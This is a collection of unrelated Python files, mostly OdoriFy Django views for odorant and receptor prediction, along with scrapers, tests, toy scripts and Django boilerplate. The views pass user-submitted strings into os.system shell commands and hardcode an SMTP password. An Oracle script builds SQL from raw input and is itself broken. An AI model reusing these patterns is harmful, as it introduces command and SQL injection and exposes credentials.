b = disp4()
b.smiles = data["SMILES"][i]
b.prob = str(data["prob"][i])[:5]
if b.prob == "nan":
b.prob = "NA"
b.sno = i + 1
b.seq = data["Sequence"][i]
if data["status"][i] == 0:
b.status = "Non-Binding"
elif data['status'][i] == 1:
b.status = "Binding"
else:
b.status = data['status'][i]
display.append(b)
col = [i for i in range(1, len(data) + 1)]
if "S.No" not in data:
data.insert(0, 'S.No', col)
data.to_csv(s, index=False)
return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": [{"row": display}], "id": True, "flag": "0"})
def result_queue(request, job_name, model, count, flag):
if request.method == "GET":
os.chdir(root)
id = check_user(request)
if flag == "1":
id = "precomputed"
user = f"olfy/static/olfy/generated/{id}"
a = result()
a.job_name = job_name
a.model = int(model)
a.count = int(count)
a.id = id
if a.model == 1:
s = f'{user}/m1/{a.job_name}/predicted_output.csv'
data = pd.read_csv(s)
data.rename(columns={'smiles': 'SMILES'}, inplace=True)
number_of_rows = len(data)
display = []
for i in range(number_of_rows):
b = disp()
b.smiles = data["SMILES"][i]
b.prob = str(data["prob"][i])[0:5]
b.sno = i + 1
temp = data["pred_odor"][i]
if temp == 1:
odor = "Odorant"
else:
odor = "Non-Odorant"
b.odor = odor
display.append(b)
col = [i for i in range(1, len(data) + 1)]
if "S.No" not in data:
data.insert(0, 'S.No', col)
data.to_csv(s, index=False)
return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": [{"row": display}], "id": True, "flag": flag})
elif a.model == 2:
display = []
for i in range(a.count):
data = pd.read_csv(f'{user}/m2/{a.job_name}/{i+1}/output.csv')
number_of_rows = len(data)
temp = {}
data.rename(columns={'smiles': 'SMILES'}, inplace=True)
data.rename(
columns={'Final_Sequence': 'Sequence'}, inplace=True)
temp["smiles"] = data["SMILES"][0]
temp1 = []
for j in range(number_of_rows):
b = disp2()
b.sno = j + 1
if "Empty" == data["Probability"][j]:
b.seq = "NA"
b.receptorname = "NA"
b.prob = "NA"
b.noresult = True
else:
b.seq = data["Sequence"][j]
b.receptorname = data["Receptor"][j]
b.prob = str(data["Probability"][j])[0:5]
b.tableno = i + 1
temp1.append(b)
temp["row"] = temp1
display.append(temp)
col = [i for i in range(1, len(data) + 1)]
if "S.No" not in data:
data.insert(0, 'S.No', col)
data.to_csv(
f'{user}/m2/{a.job_name}/{i+1}/output.csv', index=False)
return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": display, "id": True, "flag": flag})
elif a.model == 3:
display = []
for i in range(a.count):
data = pd.read_csv(f'{user}/m3/{a.job_name}/{i+1}/output.csv')
data.rename(columns={'Smiles': 'SMILES'}, inplace=True)
data.rename(columns={'seq': 'Sequence'}, inplace=True)
number_of_rows = len(data)
temp = {}
temp["seq"] = (data["header"][0])
temp1 = []
for j in range(number_of_rows):
b = disp3()
b.sno = j + 1
if "Empty" == data["Probability"][j]:
b.smiles = "NA"
b.prob = "NA"
b.noresult = True
else:
b.smiles = data["SMILES"][j]
b.prob = str(data["Probability"][j])[0:5]
b.tableno = i + 1
temp1.append(b)
temp["row"] = temp1
display.append(temp)
col = [i for i in range(1, len(data) + 1)]
if "S.No" not in data:
data.insert(0, 'S.No', col)
data.to_csv(
f'{user}/m3/{a.job_name}/{i+1}/output.csv', index=False)
return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": display, "id": True, "flag": flag})
elif a.model == 4:
s = f'{user}/m4/{a.job_name}/output.csv'
data = pd.read_csv(s)
data.rename(columns={'seq': 'Sequence'}, inplace=True)
data.rename(columns={'smiles': 'SMILES'}, inplace=True)
number_of_rows = len(data)
display = []
for i in range(number_of_rows):
b = disp4()
b.smiles = data["SMILES"][i]
b.prob = str(data["prob"][i])[:5]
if b.prob == "nan":
b.prob = "NA"
b.sno = i + 1
b.seq = data["Sequence"][i]
if data["status"][i] == 0:
b.status = "Non-Binding"
elif data['status'][i] == 1:
b.status = "Binding"
else:
b.status = data['status'][i]
display.append(b)
col = [i for i in range(1, len(data) + 1)]
if "S.No" not in data:
data.insert(0, 'S.No', col)
data.to_csv(s, index=False)
return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": [{"row": display}], "id": True, "flag": flag})
def odor(request):
if "GET" == request.method:
os.chdir(root)
check_user(request)
return render(request, "olfy/Ahuja labs website/odor.html")
else:
try:
os.chdir(root)
a = result()
id = check_user(request)
a.id = id
userm1 = f"olfy/static/olfy/generated/{id}/m1"
job_name = request.POST["job_name"]
if len(job_name) == 0:
job_name = "untitled"
smiles = request.POST["smiles"]
email = request.POST["email"]
s = smiles.replace('\r', "").split('\n')
while "" in s:
s.remove("")
temp = {"smiles": s}
data = pd.DataFrame(temp)
data = data.head(25)
count = 1
while os.path.isdir(f"{userm1}/{job_name}"):
job_name = f"{job_name}1"
os.mkdir(f"{userm1}/{job_name}")
a.job_name = job_name
job_name = f"{userm1}/{job_name}"
path = os.path.abspath(job_name)
data.to_csv(f"{path}/input.csv", index=False)
a.model = 1
os.chdir("olfy/static/olfy/generated/m1")
shutil.copyfile("model56.tar", f'{path}/model56.tar')
os.system(f"python transformer-cnn.py {path}")
f = pd.read_csv(f"{path}/input.csv")
smiles = f["smiles"]
for i in smiles:
smile_path = f"{path}/{count}"
os.makedirs(smile_path)
cmd = f"python ochem.py detectodor.pickle " + \
f'"{i}" ' f"{smile_path}"
os.system(cmd)
os.system(f"gnuplot " + f'"{path}/map.txt"')
count += 1
os.system(f"python generate_table.py {path}")
os.remove(f"{path}/map.txt")
os.remove(f"{path}/model56.tar")
os.remove(f"{path}/results.csv")
os.remove(f"{path}/input.csv")
a.count = count - 1
os.chdir("../")
writeresult(a, id)
os.chdir("../../../../")
if len(email) != 0:
send_attachment(a, email, request)
return JsonResponse({'code': 1})
except Exception as e:
traceback.print_exc()
os.chdir(root)
return JsonResponse({'code': 0})
# def getEmail(request):
# if "POST" == request.method:
# os.chdir(root)
# return JsonResponse({'code': 1})
# # registerEmail(request.POST['email'])
def odor_Or(request):
if "GET" == request.method:
os.chdir(root)
check_user(request)
return render(request, "olfy/Ahuja labs website/odorOR.html")
else:
try:
os.chdir(root)
a = result()
job_name = request.POST["job_name"]
if len(job_name) == 0:
job_name = "untitled"
smiles = request.POST["smiles"]
fasta = request.POST["fasta"]
email = request.POST["email"]
id = check_user(request)
a.id = id
s = smiles.replace('\r', "").split('\n')
while "" in s:
s.remove("")
t = fasta.replace('\r', "").split('\n')
while "" in t:
t.remove("")
seq = []
header = []
for i in range(0, len(t), 2):
header.append(t[i][1:].strip())
seq.append(t[i + 1].strip())
userm4 = f"olfy/static/olfy/generated/{id}/m4"
temp = {"smiles": s, "seq": seq, "header": header}
data = pd.DataFrame(temp)
data = data.head(25)
while os.path.isdir(f"{userm4}/{job_name}"):
job_name = f"{job_name}1"
a.job_name = job_name
job_name = f"{userm4}/{job_name}"
os.mkdir(job_name)
path = os.path.abspath(job_name)
os.chdir("olfy/static/olfy/generated/m4")
data1 = pd.DataFrame({"smiles": s})
data1.to_csv(f"{path}/input1.csv", index=False)
shutil.copyfile("model56.tar", f'{path}/model56.tar')
os.system(f"python transformer-cnn.py {path}")
os.system(f"python generate_table.py {path}")
data2 = pd.read_csv(f"{path}/predicted_output.csv")
resultdf = pd.DataFrame(
columns=['smiles', 'seq', 'status', 'prob', "odorant"])
resultdf.loc[0] = ["", "", "", "", ""]
other = []
for i in range(len(data2)):
if data2["pred_odor"][i] == 1.0:
resultdf.loc[resultdf.index.max(
) + 1] = [data["smiles"][i], data["seq"][i], "NA", "NA", "1"]
else:
resultdf.loc[resultdf.index.max(
) + 1] = [data["smiles"][i], data["seq"][i], "Non-Odorant", "NA", "0"]
resultdf[resultdf["odorant"] == "1"].to_csv(
f"{path}/input.csv", index=False)
os.system(f"python M4_final.py {path}")
a.model = 4
data = pd.read_csv(f"{path}/output.csv")
count = 0
for i in range(len(resultdf)):
if resultdf["odorant"][i] == "1":
resultdf["prob"][i] = data["prob"][count]
resultdf["status"][i] = data["status"][count]
count += 1
resultdf.drop("odorant", axis=1, inplace=True)
resultdf.drop(0, inplace=True)
resultdf["header"] = header
resultdf.to_csv(f"{path}/output.csv", index=False)
os.remove(f"{path}/input.csv")
os.remove(f"{path}/input1.csv")
os.remove(f"{path}/model56.tar")
os.remove(f"{path}/predicted_output.csv")
os.remove(f"{path}/results.csv")
a.count = len(resultdf)
os.chdir("../")
writeresult(a, id)
for i in range(4):
os.chdir("../")
if len(email) != 0:
send_attachment(a, email, request)
return JsonResponse({'code': 1})
except Exception as e:
os.chdir(root)
traceback.print_exc()
return JsonResponse({'code': 0})
def Or(request):
if "GET" == request.method:
os.chdir(root)
check_user(request)
return render(request, "olfy/Ahuja labs website/or.html")
else:
try:
os.chdir(root)
a = result()
id = check_user(request)
a.id = id
job_name = request.POST["job_name"]
if len(job_name) == 0:
job_name = "untitled"
fasta = request.POST["fasta"]
email = request.POST["email"]
counter = request.POST["normal_counter"]
fasta = fasta.split('>')
fasta.pop(0)
t = []
for seq in fasta:
for i in range(len(seq)):
if(seq[i] == '\n'):
break
t.append('>' + seq[:i])
t.append(seq[i + 1:].replace("\n", ""))
# t = fasta.replace('\r',"").split('\n')
# while "" in t:
# t.remove("")
seq = []
header = []
for i in range(0, len(t), 2):
header.append(t[i][1:].strip())
seq.append(t[i + 1].strip())
temp = {"seq": seq, "header": header}
data = pd.DataFrame(temp)
while os.path.isdir(f"olfy/static/olfy/generated/{id}/m3/{job_name}"):
job_name = f"{job_name}1"
a.job_name = job_name
job_name = f"olfy/static/olfy/generated/{id}/m3/{job_name}"
os.mkdir(job_name)
path = os.path.abspath(job_name)
data = data.head(25)
data.to_csv(f"{path}/input.csv", index=False)
a.model = 3
f = pd.read_csv(f"{path}/input.csv")
os.chdir('olfy/static/olfy/generated/m3')
a.count = len(f["seq"])
for i in range(len(f["seq"])):
dic = {"seq": [f["seq"][i]], "k": int(counter)}
df = pd.DataFrame(dic)
os.makedirs(f"{path}/{i+1}")
df.to_csv(f"{path}/{i+1}/temp.csv", index=False)
os.system(f"python M3.py {path}/{i+1}")
os.remove(f"{path}/{i+1}/temp.csv")
df = pd.read_csv(f"{path}/{i+1}/output.csv")
j = []
for k in range(len(df["Probability"])):
j.append(f["seq"][i])
df["seq"] = j
j = []
for k in range(len(df["Probability"])):
j.append(f["header"][i])
df["header"] = j
df.to_csv(f"{path}/{i+1}/output.csv", index=False)
os.remove(f"{path}/input.csv")
os.chdir("../")
writeresult(a, id)
for i in range(4):
os.chdir("../")
if len(email) != 0:
send_attachment(a, email, request)
return JsonResponse({'code': 1})
except Exception as e:
traceback.print_exc()
os.chdir(root)
return JsonResponse({'code': 0})
def odor2(request):
if "GET" == request.method:
os.chdir(root)
check_user(request)
return render(request, "olfy/Ahuja labs website/odor2.html")
else:
try:
os.chdir(root)
a = result()
id = check_user(request)
a.id = id
job_name = request.POST["job_name"]
if len(job_name) == 0:
job_name = "untitled"
smiles = request.POST["smiles"]
email = request.POST["email"]
slider = request.POST["slider_value"]
counter = request.POST["normal_counter"]
switch = request.POST["typeOfTesting"]
t = smiles.replace('\r', "").split('\n')
while "" in t:
t.remove("")
temp = {"smiles": t}
data = pd.DataFrame(temp)
data = data.head(25)
a.model = 2
userm2 = f"olfy/static/olfy/generated/{id}/m2"
while os.path.isdir(f"{userm2}/{job_name}"):
job_name = f"{job_name}1"
a.job_name = job_name
job_name = f"{userm2}/{job_name}"
path = os.path.abspath(job_name)
os.mkdir(job_name)
data.to_csv(f"{path}/input.csv", index=False)
os.chdir("olfy/static/olfy/generated/m2")
f = pd.read_csv(f"{path}/input.csv")
a.count = len(f["smiles"])
for i in range(len(f["smiles"])):
if switch == "Rapid":
dic = {"smiles": [f["smiles"][i]],
"threshhold": float(slider)}
df = pd.DataFrame(dic)
os.makedirs(f"{path}/{i+1}")
df.to_csv(f"{path}/{i+1}/temp.csv", index=False)
os.system(f"python M2.py {path}/{i+1}")
os.remove(f"{path}/{i+1}/temp.csv")
elif switch == "Normal":
dic = {"smiles": [f["smiles"][i]], "k": int(counter)}
df = pd.DataFrame(dic)
os.makedirs(f"{path}/{i+1}")
df.to_csv(f"{path}/{i+1}/temp.csv", index=False)
os.system(f"python M2-brute-force.py {path}/{i+1}")
os.remove(f"{path}/{i+1}/temp.csv")
else:
dic = {"smiles": [f["smiles"][i]],
"threshhold": float(slider)}
df = pd.DataFrame(dic)
os.makedirs(f"{path}/{i+1}")
df.to_csv(f"{path}/{i+1}/temp.csv", index=False)
os.system(f"python M2.py {path}/{i+1}")
os.remove(f"{path}/{i+1}/temp.csv")
df = pd.read_csv(f"{path}/{i+1}/output.csv")
j = []
for k in range(len(df["Probability"])):
j.append(f["smiles"][i])
df["smiles"] = j
df.to_csv(f"{path}/{i+1}/output.csv", index=False)
os.remove(f"{path}/input.csv")
os.chdir("../")
writeresult(a, id)
for i in range(4):
os.chdir("../")
if len(email) != 0:
send_attachment(a, email, request)
return JsonResponse({'code': 1})
except Exception as e:
traceback.print_exc()
os.chdir(root)
return JsonResponse({'code': 0})
@minified_response
def contactus(request):
if "GET" == request.method:
os.chdir(root)
check_user(request)
return render(request, "olfy/Ahuja labs website/contact.html")
else:
try:
os.chdir(root)
email = request.POST["email"]
subject = request.POST["title"]
message = request.POST["message"]
nameUser = request.POST["name"]
sender = "odorify.ahujalab@iiitd.ac.in"
msg = MIMEMultipart()
msg['From'] = sender
msg['To'] = sender
msg['Subject'] = subject
msg.attach(MIMEText(message, 'plain'))
text = msg.as_string()
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(sender, "odorify123")
s.sendmail(sender, sender, text)
msg = MIMEMultipart()
msg['From'] = sender
msg['To'] = email
msg['Subject'] = f"Odorify Query: {subject}"
message = f"Hi {nameUser},\nWe appreciate your interest in OdoriFy. We've received your query and we'll get back to you with a (human) response as soon as possible.\n\nCheers,\nOdoriFy Bot"
msg.attach(MIMEText(message, 'plain'))
text = msg.as_string()
s.sendmail(sender, email, text)
s.quit()
return JsonResponse({'code': 1})
except:
return JsonResponse({'code': 0})
def queue(request):
if "GET" == request.method:
os.chdir(root)
id = check_user(request)
precomputed = []
f = open(f"olfy/static/olfy/generated/{id}/result.txt")
data = f.read().splitlines()
length = len(data)
with open(f"olfy/static/olfy/generated/precomputed/result.txt", 'r') as f:
queue = []
count = 0
for i in range(0, length, 4):
temp = queuedisp()
temp.count = data[i + 1]
temp.job_name = data[i]
temp.sno = count + 1
temp.model = data[i + 2]
if temp.model == '1':
temp.model_name = "Odorant Predictor"
elif temp.model == '2':
temp.model_name = "OR Finder"
elif temp.model == '3':
temp.model_name = "Odor Finder"
elif temp.model == '4':
temp.model_name = "Odorant-OR Pair Analysis"
queue.append(temp)
count += 1
for i in range(4):
temp = queuedisp()
temp.sno = count + 1
temp.job_name = (f.readline().replace("\n", ""))
temp.count = (f.readline().replace("\n", ""))
temp.model = (f.readline().replace("\n", ""))
if temp.model == '1':
temp.model_name = "Odorant Predictor"
elif temp.model == '2':
temp.model_name = "OR Finder"
elif temp.model == '3':
temp.model_name = "Odor Finder"
elif temp.model == '4':
temp.model_name = "Odorant-OR Pair Analysis"
precomputed.append(temp)
f.readline().replace("\n", "")
count += 1
return render(request, "olfy/Ahuja labs website/queue.html", {"queue": queue, "precomputed": precomputed})
def makezip(a, request, flag="0"):
os.chdir(root)
if flag == "1":
id = "precomputed"
else:
id = check_user(request)
file_path = []
os.chdir(f"olfy/static/olfy/generated/{id}/m1")
for i in range(a.count):
file_path.append(f"{a.job_name}/{i+1}/lrp.pdf")
file_path.append(f"{a.job_name}/{i+1}/mol.svg")
file_path.append(f"{a.job_name}/predicted_output.csv")
zip = ZipFile(f"{a.job_name}/data.zip", 'w')
for file in file_path:
zip.write(file)
zip.close()
zip = open(f"{a.job_name}/data.zip", "rb")
for i in range(6):
os.chdir("../")
return zip
def makezip2(a, request, flag="0"):
os.chdir(root)
if flag == "1":
id = "precomputed"
else:
id = check_user(request)
file_path = []
os.chdir(f"olfy/static/olfy/generated/{id}/m2")
for i in range(a.count):
f = pd.read_csv(f"{a.job_name}/{i+1}/output.csv")
count = len(f)
for j in range(count):
if "Empty" != f["Probability"][0]:
file_path.append(
f"{a.job_name}/{i+1}/{j+1}_SmileInterpretability.pdf")
file_path.append(
f"{a.job_name}/{i+1}/{j+1}_SequenceInterpretability.pdf")
file_path.append(f"{a.job_name}/{i+1}/{j+1}_mol.svg")
file_path.append(f"{a.job_name}/{i+1}/output.csv")
zip = ZipFile(f"{a.job_name}/data.zip", 'w')
for file in file_path:
zip.write(file)
zip.close()
zip = open(f"{a.job_name}/data.zip", "rb")
for i in range(6):
os.chdir("../")
return zip
def makezip3(a, request, flag="0"):
os.chdir(root)
if flag == "1":
id = "precomputed"
else:
id = check_user(request)
file_path = []
os.chdir(f"olfy/static/olfy/generated/{id}/m3")
for i in range(a.count):
f = pd.read_csv(f"{a.job_name}/{i+1}/output.csv")
count = len(f)
for j in range(count):
if "Empty" != f["Probability"][0]:
file_path.append(
f"{a.job_name}/{i+1}/{j+1}_SmileInterpretability.pdf")
file_path.append(
f"{a.job_name}/{i+1}/{j+1}_SequenceInterpretability.pdf")
file_path.append(f"{a.job_name}/{i+1}/{j+1}_mol.svg")
file_path.append(f"{a.job_name}/{i+1}/output.csv")
zip = ZipFile(f"{a.job_name}/data.zip", 'w')
for file in file_path:
zip.write(file)
zip.close()
zip = open(f"{a.job_name}/data.zip", "rb")
for i in range(6):
os.chdir("../")
return zip
def makezip4(a, request, flag="0"):
os.chdir(root)
if flag == "1":
id = "precomputed"
else:
id = check_user(request)
file_path = []
os.chdir(f"olfy/static/olfy/generated/{id}/m4")
f = pd.read_csv(f"{a.job_name}/output.csv")
count = 0
for i in range(a.count):
if not str(f["prob"][i]) == "nan":
file_path.append(f"{a.job_name}/{count+1}_SmileInterpretability.pdf")
file_path.append(
f"{a.job_name}/{count+1}_SequenceInterpretability.pdf")
file_path.append(f"{a.job_name}/{count+1}_mol.svg")
count+=1
else:
continue
file_path.append(f"{a.job_name}/output.csv")
print(file_path)
zip = ZipFile(f"{a.job_name}/data.zip", 'w')
for file in file_path:
zip.write(file)
zip.close()
zip = open(f"{a.job_name}/data.zip", "rb")
for i in range(6):
os.chdir("../")
return zip
def download(request, job_name, model, count, flag):
os.chdir(root)
a = result()
a.job_name = job_name
a.model = int(model)
a.count = int(count)
zip = ''
if a.model == 1:
zip = makezip(a, request, flag)
if a.model == 2:
zip = makezip2(a, request, flag)
if a.model == 3:
zip = makezip3(a, request, flag)
if a.model == 4:
zip = makezip4(a, request, flag)
response = HttpResponse(zip, content_type='application/zip')
response['Content-Disposition'] = 'attachment; filename=data.zip'
return response
def send_attachment(a, email, request):
os.chdir(root)
attachment = ""
sender = "odorify.ahujalab@iiitd.ac.in"
if a.model == 1:
attachment = makezip(a, request, 0)
if a.model == 2:
attachment = makezip2(a, request, 0)
if a.model == 3:
attachment = makezip3(a, request, 0)
if a.model == 4:
attachment = makezip4(a, request, 0)
msg = MIMEMultipart()
msg['From'] = sender
msg['To'] = email
msg['Subject'] = "Results"
filename = "data.zip"
p = MIMEBase('application', 'octet-stream')
p.set_payload((attachment).read())
encoders.encode_base64(p)
p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
msg.attach(p)
message = "Dear User,\n Thank you for using OdoriFy.\n Please find attached your combined results in a zip file. In case of any queries, please contact us at the following link: http://odorify.ahujalab.iiitd.edu.in/olfy/contact"
msg.attach(MIMEText(message, 'plain'))
text = msg.as_string()
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(sender, "odorify123")
s.sendmail(sender, email, text)
s.quit()
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pipeline to load organizations data into Inventory."""
from google.cloud.security.common.util import log_util
from google.cloud.security.common.util import parser
from google.cloud.security.inventory.pipelines import base_pipeline
LOGGER = log_util.get_logger(__name__)
class LoadOrgsPipeline(base_pipeline.BasePipeline):
"""Pipeline to load org IAM policies data into Inventory."""
RESOURCE_NAME = 'organizations'
def _transform(self, resource_from_api):
"""Yield an iterator of loadable organizations.
Args:
resource_from_api (list): Resource manager org search
response.
https://cloud.google.com/resource-manager/reference/rest/v1/organizations/search
https://cloud.google.com/resource-manager/reference/rest/v1/organizations#Organization
Yields:
iterable: Loadable orgs, each org as a dict.
"""
for org in resource_from_api:
# org_name is the unique identifier for the org, formatted as
# "organizations/<organization_id>".
org_name = org.get('name')
org_id = org_name[len('%s/' % self.RESOURCE_NAME):]
yield {'org_id': org_id,
'name': org_name,
'display_name': org.get('displayName'),
'lifecycle_state': org.get('lifecycleState'),
'raw_org': parser.json_stringify(org),
'creation_time': parser.format_timestamp(
org.get('creationTime'),
self.MYSQL_DATETIME_FORMAT)}
def _retrieve(self):
"""Retrieve the organizations resources from GCP.
Returns:
iterable: resource manager org search response.
https://cloud.google.com/resource-manager/reference/rest/v1/organizations/search
"""
return self.safe_api_call('get_organizations', self.RESOURCE_NAME)
def run(self):
"""Runs the data pipeline."""
orgs_map = self._retrieve()
if orgs_map:
loadable_orgs = self._transform(orgs_map)
self._load(self.RESOURCE_NAME, loadable_orgs)
self._get_loaded_count()
|
"""
Unit tests
"""
import unittest
from mock import patch
from utils import proxy_request
def mocked_config_requests(**kwargs):
"""
Mocks config endpoints
"""
if kwargs['command'] == 'agencyList':
return 200
elif kwargs['command'] == 'routeList' and 'a' in kwargs.keys():
return 200
elif (kwargs['command'] == 'routeConfig' and 'a' in kwargs.keys()) or \
(kwargs['command'] == 'routeConfig' and 'a' in kwargs.keys() and 'r' in kwargs.keys()):
return 200
return 404
def mocked_message_requests(**kwargs):
"""
Mocks message endpoints
"""
if (kwargs['command'] == 'messages' and 'a' in kwargs.keys()) or \
(kwargs['command'] == 'messages' and 'a' in kwargs.keys() and 'r' in kwargs.keys()):
return 200
elif kwargs['command'] == 'vehicleLocations' and 'a' in kwargs.keys():
return 200
elif (kwargs['command'] == 'routeConfig' and 'a' in kwargs.keys()) and 't' in kwargs.keys() or \
(kwargs['command'] == 'routeConfig' and 'a' in kwargs.keys() and 'r' in kwargs.keys() \
and 't' in kwargs.keys()):
return 200
return 404
class MyTest(unittest.TestCase):
"""
Unit tests
"""
@patch('utils.requests.get')
def test_request_response(self, mock_get):
"""
Test request response of API call
"""
mock_get.return_value[0].status = '200 OK'
resp = proxy_request('http://localhost/api/v1/config?command=agencyList')
self.assertEqual(mock_get.return_value[0].status, resp[0].status)
@patch('config.config', side_effect=mocked_config_requests)
def test_config_response(self, mock_get):
"""
Test that incorrect endpoint returns an error
"""
mock_get.return_value = 200
self.assertEqual(mocked_config_requests(command='agencyList'), mock_get.return_value)
self.assertEqual(mocked_config_requests(command='routeList', a='sf-muni'), mock_get.return_value)
self.assertEqual(mocked_config_requests(command='routeConfig', a='sf-muni'), mock_get.return_value)
self.assertEqual(mocked_config_requests(command='routeConfig', a='sf-muni', r='N'), mock_get.return_value)
mock_get.return_value = 404
self.assertEqual(mocked_config_requests(command='routeList'), mock_get.return_value)
self.assertEqual(mocked_config_requests(command='routeConfig', r='N'), mock_get.return_value)
@patch('message.message', side_effect=mocked_message_requests)
def test_message_response(self, mock_get):
"""
Test that incorrect endpoint returns an error
"""
mock_get.return_value = 200
self.assertEqual(mocked_message_requests(command='messages', a='sf-muni'), mock_get.return_value)
self.assertEqual(mocked_message_requests(command='messages', a='sf-muni', r='N'), mock_get.return_value)
mock_get.return_value = 404
self.assertEqual(mocked_message_requests(command='messages', r='N'), mock_get.return_value)
if __name__ == '__main__':
unittest.main()
|
# Given a positive integer num consisting only of digits 6 and 9.
#
# Return the maximum number you can get by changing at most
# one digit (6 becomes 9, and 9 becomes 6).
class Solution:
def maximum69Number(self, num):
for ii, digit in enumerate(str(num)):
if digit == '6':
power = len(str(num)) - ii - 1
num = num + 3 * 10 ** power
break
return num
if __name__ == '__main__':
test_input = 969669
print(Solution.maximum69Number(Solution, test_input))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import bottle
import requests
app = '10.33.39.200'
web = '10.33.39.200'
@bottle.route('/')
def index():
ret = ''
try:
r = requests.get("http://%s:8080/" % app)
print r.text
ret = r.text
except requests.exceptions.RequestException, err:
ret = err
return '<h1>Web: %s</h1></br><h2>App: %s, Content: %s</h2>' % (
web, app, ret)
if __name__ == '__main__':
bottle.run(host='0.0.0.0', port=80, reloader=True)
|
import turtle
my_window = turtle.Screen()
my_pen=turtle.Turtle()
a=[2,3,5,7,11,13,17,19,23,31,37,41,43,47]
for i in a:
if(i%2==0):
my_pen.forward(100)
my_pen.right(90)
else:
my_pen.forward(100)
my_pen.left(90)
|
# coding=utf8
from lib.opener import Opener
import re, sys
if __name__ == '__main__':
base_url = 'http://wap.gzaic.gov.cn/Entity/Default.aspx?__ufps={0}'
corp_url = 'http://wap.gzaic.gov.cn/Entity/show.aspx?id={0}'
ufps = ''
data = {
'btnSearchQy': '查询企业基本信息',
'txtEntName': '',
'__EVENTTARGET': '',
'__EVENTARGUMENT': ''
}
opener = Opener(has_cookie=True)
html = opener.open(base_url, raw_string=False)
print('************************************************')
ufps_reg = re.compile(r'__ufps=(?P<__ufps>\d*)')
search_obj = ufps_reg.search(html)
if search_obj:
ufps = search_obj.groups()[0]
print('__ufps: %s' % ufps)
else:
print('__ufps not found!')
sys.exit()
register_code = '4401011103185'
data['txtRegNO'] = register_code
url = base_url.format(ufps)
print('************************************************')
html = opener.open(url, data, raw_string=False)
print('************************************************')
ufps = ufps_reg.search(html).groups()[0]
if html.find('__VIEWSTATE') < 0:
sys.exit()
corp_id_reg = re.compile(r'show\.aspx\?id=(?P<id>\d*)"')
corp_id = ''
search_obj = corp_id_reg.search(html)
if search_obj:
corp_id = search_obj.groups()[0]
print('corp id: %s' % corp_id)
else:
print('Not found corp id!')
sys.exit()
url = corp_url.format(corp_id)
html = opener.open(url, raw_string=False)
print('************************************************')
corp_info = {
'register_code': register_code,
'status': '登记成立',
'period': '长期',
}
corp_reg = re.compile(r'注册号:(?P<register_code>[^<]*)<br>[^:]*企业名称:(?P<name>[^<]*)<br>[^:]*企业地址:(?P<addr>[^<]*)<br>[^:]*企业状态:[^\n]*<br>[^:]*负责人:(?P<representative>[^<]*)<br>[^:]*企业类型:(?P<nature>[^<]*)<br>[^:]*成立日期:(?P<establishment_data>[^<]*)<br>[^:]*核准日期:[^\n]*<br>[^:]*注册资本:(?P<capital>[^<]*)<br>[^:]*实收资本:[^\n]*<br>[^:]*登记机关:(?P<register_department>[^<]*)<br>[^:]*经营范围:(?P<scope>[^<]*)<br>', re.S)
search_obj = corp_reg.search(html)
if search_obj:
corp_info.update(search_obj.groupdict())
print(corp_info)
else:
print('Not match!')
corp_id = search_obj.groups()[0]
|
while True:
print ("Quem es tu? ")
name = input()
if name != 'joao':
continue
print ("Fala aew Jaum. Qual é o password? ")
password = input()
if password == 'swordfish':
break
print('Access granted')
|
import sys
import getpass
import os
import random
import cx_Oracle
import datetime
from addperson import *
def driverLicenceRegistration(curs, connection):
sin = str(input("please input user sin > "))
search_str = 'SELECT name FROM people p WHERE p.sin =\''
search_str += sin
search_str += "\'"
print(search_str)
curs.execute(search_str)
result = curs.fetchall()
print(result)
if (len(result) == 0):
n_own = 'y'
#n_own = input("new sin entered, add new person? (y) or (n) or (e) > ")
if (n_own == 'e'):
pass
else:
n_own = input("user found, add vehicle? (y)es or (n)o or (e)xit > ")
if (n_own == 'e'):
pass
licence_no = input("input licence number > ")
Dclass = input("input licence class > ")
photo = input("input (photoname).jpg > ")
issuing_date = input("input issuing date > ")
expiring_date = input("input expiration date > ")
f_image = open(photo,'rb')
photo = f_image.read()
ddata =(licence_no, sin, Dclass, photo, issuing_date, expiring_date)
#prepare memory for operation parameters
curs.bindarraysize = 1
curs.setinputsizes(30, 30, 10 , cx_Oracle.BLOB, cx_0racle.Date, cx_0racle.Date)
curs.setinputsizes(photo = cx_Oracle.BLOB)
cursInsert.executemany("INSERT INTO drive_license( licence_no, sin, class, photo, issuing_date, expiring_date)"
"VALUES (:1, :2, :3, :4, :5, :6)",ddata)
insert = """insert into drive_license( licence_no, sin, class, photo, issuing_date, expiring_date)
values (:license_no, :sin, :class, :image, :issuing_date, expiring_date)"""
curs.execute(insert,{'licence_no':licence_no, 'sin':sin,
'Dclass':Class, 'photo':image, 'issuing_date':issuing_date, 'expiring_date':expiring_date})
|
from django.conf.urls.defaults import *
urlpatterns = patterns('quiz.views',
url(r'^$', 'quiz_view_all', name='quiz_view_all'),
url(r'^welcome/$', 'quiz_welcome', name='quiz_welcome'),
url(r'^create/$', 'quiz_create', name='quiz_create'),
url(r'^view/(?P<quiz_id>\d+)/$', 'quiz_view', name='quiz_view'),
url(r'^update/(?P<quiz_id>\d+)/$', 'quiz_update', name='quiz_update'),
url(r'^delete/(?P<quiz_id>\d+)/$', 'quiz_delete', name='quiz_delete'),
url(r'^(?P<quiz_id>\d+)/question-new/$', 'question_new', name='question_new'),
url(r'^(?P<quiz_id>\d+)/question-view/(?P<question_id>\d+)$', 'question_view', name='question_view'),
)
|
# Generated by Django 2.2.5 on 2019-10-04 19:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('carts', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='cart',
name='quantity',
field=models.IntegerField(default=0, max_length=10),
),
]
